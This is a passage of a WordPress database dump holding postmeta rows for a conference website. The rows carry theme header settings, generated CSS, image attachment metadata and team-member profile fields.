(12368,2527,'_dt_fancy_header_bg_fullscreen','1'),
(12369,2527,'_dt_fancy_header_bg_overlay','0'),
(12370,2527,'_dt_fancy_header_overlay_color','#000'),
(12371,2527,'_dt_fancy_header_bg_overlay_opacity','50'),
(12372,2527,'_dt_fancy_header_scroll_effect','default'),
(12373,2527,'_dt_fancy_header_bg_parallax','0.5'),
(12374,2527,'_dt_fancy_header_responsiveness_heading',''),
(12375,2527,'_dt_fancy_header_responsiveness','enabled'),
(12376,2527,'_dt_fancy_header_responsiveness_switch','778px'),
(12377,2527,'_dt_fancy_header_responsive_height','70'),
(12378,2527,'_dt_fancy_header_responsive_font_size','30'),
(12379,2527,'_dt_fancy_header_responsive_title_line_height','38'),
(12380,2527,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(12381,2527,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(12382,2527,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(12383,2527,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(12431,2533,'_dt_fancy_header_layout_heading',''),
(12432,2533,'_dt_fancy_header_title_aligment','center'),
(12433,2533,'_dt_fancy_header_height','300'),
(12434,2533,'_dt_fancy_header_padding-top','0px'),
(12435,2533,'_dt_fancy_header_padding-bottom','0px'),
(12436,2533,'_dt_fancy_header_breadcrumbs_heading',''),
(12437,2533,'_dt_fancy_header_breadcrumbs','disabled'),
(12438,2533,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(12439,2533,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(12440,2533,'_dt_fancy_header_title_heading',''),
(12441,2533,'_dt_fancy_header_title_mode','generic'),
(12442,2533,'_dt_fancy_header_title',''),
(12443,2533,'_dt_fancy_header_title_font_size','30'),
(12444,2533,'_dt_fancy_header_title_line_height','36'),
(12445,2533,'_dt_fancy_header_text_transform','none'),
(12446,2533,'_dt_fancy_header_title_color_mode','color'),
(12447,2533,'_dt_fancy_header_title_color','#ffffff'),
(12448,2533,'_dt_fancy_header_subtitle_heading',''),
(12449,2533,'_dt_fancy_header_subtitle',''),
(12450,2533,'_dt_fancy_header_subtitle_font_size','18'),
(12451,2533,'_dt_fancy_header_subtitle_line_height','26'),
(12452,2533,'_dt_fancy_header_subtitle_text_transform','none'),
(12453,2533,'_dt_fancy_header_subtitle_color_mode','color'),
(12454,2533,'_dt_fancy_header_subtitle_color','#ffffff'),
(12455,2533,'_dt_fancy_header_bg_heading',''),
(12456,2533,'_dt_fancy_header_bg_color','#222222'),
(12457,2533,'_dt_fancy_header_bg_image_origin','custom'),
(12458,2533,'_dt_fancy_header_bg_image','a:0:{}'),
(12459,2533,'_dt_fancy_header_bg_repeat','no-repeat'),
(12460,2533,'_dt_fancy_header_bg_position_x','center'),
(12461,2533,'_dt_fancy_header_bg_position_y','center'),
(12462,2533,'_dt_fancy_header_bg_fullscreen','1'),
(12463,2533,'_dt_fancy_header_bg_overlay','0'),
(12464,2533,'_dt_fancy_header_overlay_color','#000'),
(12465,2533,'_dt_fancy_header_bg_overlay_opacity','50'),
(12466,2533,'_dt_fancy_header_scroll_effect','default'),
(12467,2533,'_dt_fancy_header_bg_parallax','0.5'),
(12468,2533,'_dt_fancy_header_responsiveness_heading',''),
(12469,2533,'_dt_fancy_header_responsiveness','enabled'),
(12470,2533,'_dt_fancy_header_responsiveness_switch','778px'),
(12471,2533,'_dt_fancy_header_responsive_height','70'),
(12472,2533,'_dt_fancy_header_responsive_font_size','30'),
(12473,2533,'_dt_fancy_header_responsive_title_line_height','38'),
(12474,2533,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(12475,2533,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(12476,2533,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(12477,2533,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(12478,2731,'_wp_attached_file','2022/10/12.jpg'),
(12479,2731,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:695;s:4:\"file\";s:14:\"2022/10/12.jpg\";s:8:\"filesize\";i:193484;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"12-300x163.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:163;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11213;}s:5:\"large\";a:5:{s:4:\"file\";s:15:\"12-1024x556.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:556;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83892;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5034;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:14:\"12-768x417.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:417;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52978;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12480,2732,'_wp_attached_file','2022/10/11.jpg'),
(12481,2732,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:848;s:4:\"file\";s:14:\"2022/10/11.jpg\";s:8:\"filesize\";i:252495;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"11-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12886;}s:5:\"large\";a:5:{s:4:\"file\";s:15:\"11-1024x678.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:678;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103620;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5701;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:14:\"11-768x509.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:509;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63440;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12482,2733,'_wp_attached_file','2022/10/A1.jpg'),
(12483,2733,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1278;s:6:\"height\";i:790;s:4:\"file\";s:14:\"2022/10/A1.jpg\";s:8:\"filesize\";i:657017;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"A1-300x185.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:185;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11880;}s:5:\"large\";a:5:{s:4:\"file\";s:15:\"A1-1024x633.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:633;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87591;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"A1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5258;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:14:\"A1-768x475.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:475;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54939;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(12487,2736,'_edit_lock','1675605679:1'),
(12488,2737,'_wp_attached_file','2022/10/Untitled-1.jpg'),
(12489,2737,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:753;s:6:\"height\";i:424;s:4:\"file\";s:22:\"2022/10/Untitled-1.jpg\";s:8:\"filesize\";i:402686;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"Untitled-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18240;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"Untitled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9123;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(12490,2736,'_thumbnail_id','2737'),
(12491,2736,'_edit_last','1'),
(12492,2736,'_wpb_vc_js_status','true'),
(12493,2736,'_dt_sidebar_position','disabled'),
(12494,2736,'_dt_sidebar_widgetarea_id','sidebar_1'),
(12495,2736,'_dt_sidebar_hide_on_mobile','0'),
(12496,2736,'_dt_footer_show','1'),
(12497,2736,'_dt_footer_widgetarea_id','sidebar_2'),
(12498,2736,'_dt_footer_hide_on_mobile','0'),
(12499,2736,'_dt_header_title','fancy'),
(12500,2736,'_dt_header_background','normal'),
(12501,2736,'_dt_header_background_below_slideshow','disabled'),
(12502,2736,'_dt_header_transparent_bg_color_scheme','light'),
(12503,2736,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(12504,2736,'_dt_header_transparent_top_bar_bg_opacity','25'),
(12505,2736,'_dt_header_transparent_bg_color','#000000'),
(12506,2736,'_dt_header_transparent_bg_opacity','50'),
(12507,2736,'_dt_header_disabled_background','normal'),
(12508,2736,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(12509,2736,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(12510,2736,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(12511,2736,'_dt_header_disabled_transparent_bg_color','#000000'),
(12512,2736,'_dt_header_disabled_transparent_bg_opacity','50'),
(12513,2736,'_dt_page_overrides_top_margin',''),
(12514,2736,'_dt_page_overrides_right_margin',''),
(12515,2736,'_dt_page_overrides_bottom_margin',''),
(12516,2736,'_dt_page_overrides_left_margin',''),
(12517,2736,'_dt_mobile_page_padding_top',''),
(12518,2736,'_dt_mobile_page_padding_right',''),
(12519,2736,'_dt_mobile_page_padding_bottom',''),
(12520,2736,'_dt_mobile_page_padding_left',''),
(12521,2736,'_dt_fancy_header_layout_heading',''),
(12522,2736,'_dt_fancy_header_title_aligment','center'),
(12523,2736,'_dt_fancy_header_height','300'),
(12524,2736,'_dt_fancy_header_padding-top','0px'),
(12525,2736,'_dt_fancy_header_padding-bottom','0px'),
(12526,2736,'_dt_fancy_header_breadcrumbs_heading',''),
(12527,2736,'_dt_fancy_header_breadcrumbs','disabled'),
(12528,2736,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(12529,2736,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(12530,2736,'_dt_fancy_header_title_heading',''),
(12531,2736,'_dt_fancy_header_title_mode','custom'),
(12532,2736,'_dt_fancy_header_title',''),
(12533,2736,'_dt_fancy_header_title_font_size','30'),
(12534,2736,'_dt_fancy_header_title_line_height','36'),
(12535,2736,'_dt_fancy_header_text_transform','none'),
(12536,2736,'_dt_fancy_header_title_color_mode','color'),
(12537,2736,'_dt_fancy_header_title_color','#ffffff'),
(12538,2736,'_dt_fancy_header_subtitle_heading',''),
(12539,2736,'_dt_fancy_header_subtitle',''),
(12540,2736,'_dt_fancy_header_subtitle_font_size','38'),
(12541,2736,'_dt_fancy_header_subtitle_line_height','26'),
(12542,2736,'_dt_fancy_header_subtitle_text_transform','none'),
(12543,2736,'_dt_fancy_header_subtitle_color_mode','color'),
(12544,2736,'_dt_fancy_header_subtitle_color','#ffffff'),
(12545,2736,'_dt_fancy_header_bg_heading',''),
(12546,2736,'_dt_fancy_header_bg_color','#222222'),
(12547,2736,'_dt_fancy_header_bg_image_origin','featured_image'),
(12548,2736,'_dt_fancy_header_bg_image','a:0:{}'),
(12549,2736,'_dt_fancy_header_bg_repeat','no-repeat'),
(12550,2736,'_dt_fancy_header_bg_position_x','center'),
(12551,2736,'_dt_fancy_header_bg_position_y','center'),
(12552,2736,'_dt_fancy_header_bg_fullscreen','1'),
(12553,2736,'_dt_fancy_header_bg_overlay','0'),
(12554,2736,'_dt_fancy_header_overlay_color','#000'),
(12555,2736,'_dt_fancy_header_bg_overlay_opacity','50'),
(12556,2736,'_dt_fancy_header_scroll_effect','default'),
(12557,2736,'_dt_fancy_header_bg_parallax','0.5'),
(12558,2736,'_dt_fancy_header_responsiveness_heading',''),
(12559,2736,'_dt_fancy_header_responsiveness','enabled'),
(12560,2736,'_dt_fancy_header_responsiveness_switch','778px'),
(12561,2736,'_dt_fancy_header_responsive_height','70'),
(12562,2736,'_dt_fancy_header_responsive_font_size','30'),
(12563,2736,'_dt_fancy_header_responsive_title_line_height','38'),
(12564,2736,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(12565,2736,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(12566,2736,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(12567,2736,'_dt_project_options_back_button',''),
(12568,2736,'_dt_project_options_show_link',''),
(12569,2736,'_dt_project_options_link',''),
(12570,2736,'_dt_project_options_link_target',''),
(12571,2736,'_dt_project_options_link_name',''),
(12572,2736,'_dt_project_options_hide_thumbnail','1'),
(12573,2736,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(12574,2736,'_dt_project_options_related_mode','same'),
(12575,2736,'_dt_project_options_preview','normal'),
(12576,2736,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/10/Untitled-1.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 38px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(12577,2736,'_wp_page_template','default'),
(12579,2736,'_dt_microsite_primary_menu',''),
(12580,2736,'_dt_microsite_split_left_menu',''),
(12581,2736,'_dt_microsite_split_right_menu',''),
(12582,2736,'_dt_microsite_mobile_menu',''),
(12584,2743,'_wp_attached_file','2022/10/Untitled-1-1.jpg'),
(12585,2743,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:753;s:6:\"height\";i:424;s:4:\"file\";s:24:\"2022/10/Untitled-1-1.jpg\";s:8:\"filesize\";i:402686;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"Untitled-1-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18240;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"Untitled-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9123;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(12586,2745,'_edit_lock','1668034952:1'),
(12587,2746,'_wp_attached_file','2022/10/w111.jpg'),
(12588,2746,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:300;s:4:\"file\";s:16:\"2022/10/w111.jpg\";s:8:\"filesize\";i:82951;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w111-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6139;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(12589,2745,'_thumbnail_id','2766'),
(12590,2745,'_edit_last','1'),
(12591,2745,'_dt_sidebar_position','disabled'),
(12592,2745,'_dt_sidebar_widgetarea_id','sidebar_1'),
(12593,2745,'_dt_sidebar_hide_on_mobile','0'),
(12594,2745,'_dt_footer_show','1'),
(12595,2745,'_dt_footer_widgetarea_id','sidebar_2'),
(12596,2745,'_dt_footer_hide_on_mobile','0'),
(12597,2745,'_dt_header_title','fancy'),
(12598,2745,'_dt_header_background','normal'),
(12599,2745,'_dt_header_background_below_slideshow','disabled'),
(12600,2745,'_dt_header_transparent_bg_color_scheme','light'),
(12601,2745,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(12602,2745,'_dt_header_transparent_top_bar_bg_opacity','25'),
(12603,2745,'_dt_header_transparent_bg_color','#000000'),
(12604,2745,'_dt_header_transparent_bg_opacity','50'),
(12605,2745,'_dt_header_disabled_background','normal'),
(12606,2745,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(12607,2745,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(12608,2745,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(12609,2745,'_dt_header_disabled_transparent_bg_color','#000000'),
(12610,2745,'_dt_header_disabled_transparent_bg_opacity','50'),
(12611,2745,'_dt_page_overrides_top_margin',''),
(12612,2745,'_dt_page_overrides_right_margin',''),
(12613,2745,'_dt_page_overrides_bottom_margin',''),
(12614,2745,'_dt_page_overrides_left_margin',''),
(12615,2745,'_dt_mobile_page_padding_top',''),
(12616,2745,'_dt_mobile_page_padding_right',''),
(12617,2745,'_dt_mobile_page_padding_bottom',''),
(12618,2745,'_dt_mobile_page_padding_left',''),
(12619,2745,'_dt_fancy_header_layout_heading',''),
(12620,2745,'_dt_fancy_header_title_aligment','center'),
(12621,2745,'_dt_fancy_header_height','300'),
(12622,2745,'_dt_fancy_header_padding-top','0px'),
(12623,2745,'_dt_fancy_header_padding-bottom','0px'),
(12624,2745,'_dt_fancy_header_breadcrumbs_heading',''),
(12625,2745,'_dt_fancy_header_breadcrumbs','disabled'),
(12626,2745,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(12627,2745,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(12628,2745,'_dt_fancy_header_title_heading',''),
(12629,2745,'_dt_fancy_header_title_mode','custom'),
(12630,2745,'_dt_fancy_header_title','Timo Balz Wuhan University, China (WG I/5)'),
(12631,2745,'_dt_fancy_header_title_font_size','30'),
(12632,2745,'_dt_fancy_header_title_line_height','36'),
(12633,2745,'_dt_fancy_header_text_transform','none'),
(12634,2745,'_dt_fancy_header_title_color_mode','color'),
(12635,2745,'_dt_fancy_header_title_color','#ffffff'),
(12636,2745,'_dt_fancy_header_subtitle_heading',''),
(12637,2745,'_dt_fancy_header_subtitle',''),
(12638,2745,'_dt_fancy_header_subtitle_font_size','18'),
(12639,2745,'_dt_fancy_header_subtitle_line_height','26'),
(12640,2745,'_dt_fancy_header_subtitle_text_transform','none'),
(12641,2745,'_dt_fancy_header_subtitle_color_mode','color'),
(12642,2745,'_dt_fancy_header_subtitle_color','#ffffff'),
(12643,2745,'_dt_fancy_header_bg_heading',''),
(12644,2745,'_dt_fancy_header_bg_color','#222222'),
(12645,2745,'_dt_fancy_header_bg_image_origin','custom'),
(12646,2745,'_dt_fancy_header_bg_image','a:0:{}'),
(12647,2745,'_dt_fancy_header_bg_repeat','no-repeat'),
(12648,2745,'_dt_fancy_header_bg_position_x','center'),
(12649,2745,'_dt_fancy_header_bg_position_y','center'),
(12650,2745,'_dt_fancy_header_bg_fullscreen','1'),
(12651,2745,'_dt_fancy_header_bg_overlay','0'),
(12652,2745,'_dt_fancy_header_overlay_color','#000'),
(12653,2745,'_dt_fancy_header_bg_overlay_opacity','50'),
(12654,2745,'_dt_fancy_header_scroll_effect','default'),
(12655,2745,'_dt_fancy_header_bg_parallax','0.5'),
(12656,2745,'_dt_fancy_header_responsiveness_heading',''),
(12657,2745,'_dt_fancy_header_responsiveness','enabled'),
(12658,2745,'_dt_fancy_header_responsiveness_switch','778px'),
(12659,2745,'_dt_fancy_header_responsive_height','70'),
(12660,2745,'_dt_fancy_header_responsive_font_size','30'),
(12661,2745,'_dt_fancy_header_responsive_title_line_height','38'),
(12662,2745,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(12663,2745,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(12664,2745,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(12665,2745,'_dt_teammate_options_go_to_single','1'),
(12666,2745,'_dt_teammate_options_position',''),
(12667,2745,'_dt_teammate_options_website',''),
(12668,2745,'_dt_teammate_options_mail',''),
(12669,2745,'_dt_teammate_options_facebook',''),
(12670,2745,'_dt_teammate_options_twitter',''),
(12671,2745,'_dt_teammate_options_dribbble',''),
(12672,2745,'_dt_teammate_options_you-tube',''),
(12673,2745,'_dt_teammate_options_rss',''),
(12674,2745,'_dt_teammate_options_delicious',''),
(12675,2745,'_dt_teammate_options_flickr',''),
(12676,2745,'_dt_teammate_options_lastfm',''),
(12677,2745,'_dt_teammate_options_linkedin',''),
(12678,2745,'_dt_teammate_options_vimeo',''),
(12679,2745,'_dt_teammate_options_tumbler',''),
(12680,2745,'_dt_teammate_options_pinterest',''),
(12681,2745,'_dt_teammate_options_devian',''),
(12682,2745,'_dt_teammate_options_skype',''),
(12683,2745,'_dt_teammate_options_github',''),
(12684,2745,'_dt_teammate_options_instagram',''),
(12685,2745,'_dt_teammate_options_stumbleupon',''),
(12686,2745,'_dt_teammate_options_behance',''),
(12687,2745,'_dt_teammate_options_px-500',''),
(12688,2745,'_dt_teammate_options_tripedvisor',''),
(12689,2745,'_dt_teammate_options_vk',''),
(12690,2745,'_dt_teammate_options_foursquare',''),
(12691,2745,'_dt_teammate_options_xing',''),
(12692,2745,'_dt_teammate_options_weibo',''),
(12693,2745,'_dt_teammate_options_odnoklassniki',''),
(12694,2745,'_dt_teammate_options_research-gate',''),
(12695,2745,'_dt_teammate_options_yelp',''),
(12696,2745,'_dt_teammate_options_blogger',''),
